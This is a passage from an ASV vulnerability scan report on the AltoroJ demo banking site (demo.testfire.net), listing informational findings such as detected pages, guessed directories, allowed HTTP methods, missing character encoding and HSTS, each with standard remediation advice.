&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 706 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10"
>http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.

362 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/survey_questions.jsp


Port: tcp/8080

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 707 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

363 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/login.jsp


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

364 Discovered Web Directories 0.0 Info Pass URL: http://65.61.137.117:8080/bank/


Port: tcp/8080

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:8080/bank/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 708 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

365 Discovered HTTP Methods 0.0 Info Pass URL: http://65.61.137.117:8080/my%20documents/


Port: tcp/8080

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117:8080/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

366 Discovered Web Directories 0.0 Info Pass URL: https://demo.testfire.net:8443/admin/


Port: tcp/8443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 709 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:8443/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

367 Enumerated Applications 0.0 Info Pass URL: https://demo.testfire.net:8443/


Port: tcp/8443

The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

368 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/sendFeedback


Port: tcp/80

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 710 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

369 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/index.jsp?content=business.htm


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

370 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

371 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/feedback.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 711 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https

372 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/survey_questions.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

373 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/index.jsp?content=business.htm


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

374 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/login.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 712 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

375 Website Detected 0.0 Info Pass URL: http://demo.testfire.net/


Port: tcp/80

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

376 Discovered Web Directories 0.0 Info Pass URL: https://65.61.137.117:443/bank/


Port: tcp/443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:443/bank/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

377 Discovered HTTP Methods 0.0 Info Pass URL: http://demo.testfire.net:8080/my%20documents/


Port: tcp/8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 713 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net:8080/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

378 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/survey_questions.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

379 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/survey_questions.jsp?step=a


Port: tcp/443

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 714 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

380 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/status_check.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

381 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/index.jsp?content=personal.htm


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

382 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/index.jsp?content=inside.htm


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 715 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

383 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/index.jsp


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

384 SSL Perfect Forward 0.0 Info Pass Port: tcp/8443


Secrecy Supported
The server supports Ephemeral Diffie-Hellman ciphers for the SSL/TLS
key exchange phase. Using this algorithm enforces Forward Secrecy for
secure communications with the server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Evidence:
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 716 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA

Remediation:
No remediation is necessary.

385 HTTP Responses Missing 0.0 Info Pass URL: http://demo.testfire.net/high_yield_investments.htm


Character Encoding Port: tcp/80

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 717 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://demo.testfire.net/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

386 HTTP Responses Missing 0.0 Info Pass URL: http://65.61.137.117:8080/retirement.htm


Character Encoding Port: tcp/8080

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 718 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://65.61.137.117:8080/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

387 Discovered Web Directories 0.0 Info Pass URL: https://demo.testfire.net:443/bank/


Port: tcp/443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:443/bank/

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 719 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

388 HTTP Responses Missing 0.0 Info Pass URL: https://demo.testfire.net/swagger/index.html


Character Encoding Port: tcp/443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 720 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://demo.testfire.net/swagger/index.html

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

389 Enumerated Applications 0.0 Info Pass URL: https://65.61.137.117/


Port: tcp/443

The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

URL: https://65.61.137.117/

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 721 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

390 Website Detected 0.0 Info Pass Port: tcp/443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

391 Discovered Web Directories 0.0 Info Pass URL: http://65.61.137.117:80/bank/


Port: tcp/80

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:80/bank/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 722 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

392 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/subscribe.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

393 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/survey_questions.jsp?step=a


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

394 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/subscribe.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

395 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/status_check.jsp


Port: tcp/8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 723 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

396 Website Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/


Port: tcp/8080

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

397 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

398 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/index.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 724 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http

399 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/sendFeedback


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

400 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/index.jsp?content=personal.htm


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

401 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 725 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

402 Insufficient or No use of 0.0 Info Pass URL: https://demo.testfire.net/


Strict Transport Security Port: tcp/443
header
HTTP Strict Transport Security (HSTS) is an opt-in security
enhancement that is specified by a web application through the use of
a special response header. Once a supported browser receives this
header that browser will prevent any communications from being sent
over HTTP to the specified domain and will instead send all
communications over HTTPS. It also prevents HTTPS click through
prompts on browsers.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security

Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 726 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

403 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/survey_questions.jsp?step=a


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

404 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/index.jsp?content=inside.htm


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

405 Website Detected 0.0 Info Pass URL: https://65.61.137.117:8443/


Port: tcp/8443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

406 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/search.jsp?query=_WSETESTDATA


Port: tcp/443

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 727 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

407 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/doSubscribe


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

408 Website Detected 0.0 Info Pass URL: https://65.61.137.117/


Port: tcp/443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

409 Discovered HTTP Methods 0.0 Info Pass URL: https://demo.testfire.net:8443/my%20documents/


Port: tcp/8443

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 728 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net:8443/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

410 Website Detected 0.0 Info Pass URL: https://demo.testfire.net:8443/


Port: tcp/8443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

411 HTTP Responses Missing 0.0 Info Pass URL: https://65.61.137.117/high_yield_investments.htm


Character Encoding Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 729 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://65.61.137.117/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 730 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
encoding.

412 Discovered HTTP Methods 0.0 Info Pass URL: http://demo.testfire.net:8080/swagger/


Port: tcp/8080

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net:8080/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

413 Discovered Web Directories 0.0 Info Pass URL: http://65.61.137.117:80/admin/

